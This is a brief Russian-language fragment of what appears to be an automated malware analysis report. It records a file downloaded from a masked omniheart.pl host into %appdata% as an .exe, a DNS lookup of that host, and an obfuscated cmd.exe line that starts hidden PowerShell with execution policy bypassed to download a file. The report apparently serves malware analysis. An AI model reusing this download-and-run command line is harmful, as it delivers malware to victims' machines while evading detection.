Техническая информация
- http://iu#####.omniheart.pl/file/set.rte как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^owe^rShe^l^l^.Exe -^ExEC^utioN^P^O^l^IC^Y B^ypaS^S -^NOpR^O^fiLe^ -wIndO^WsT^YLe^ h^ID^dEn (N^e^W-O^B^jEc^t s^ystEM.^NeT.wEb^c^LiEn^T).^Do^Wn^LO^a^DfiL^E(^'http://iu###...
- DNS ASK iu#####.omniheart.pl
- '<SYSTEM32>\cmd.exe' /c "P^owe^rShe^l^l^.Exe -^ExEC^utioN^P^O^l^IC^Y B^ypaS^S -^NOpR^O^fiLe^ -wIndO^WsT^YLe^ h^ID^dEn (N^e^W-O^B^jEc^t s^ystEM.^NeT.wEb^c^LiEn^T).^Do^Wn^LO^a^DfiL^E(^'http://iu###...' (со скрытым окном)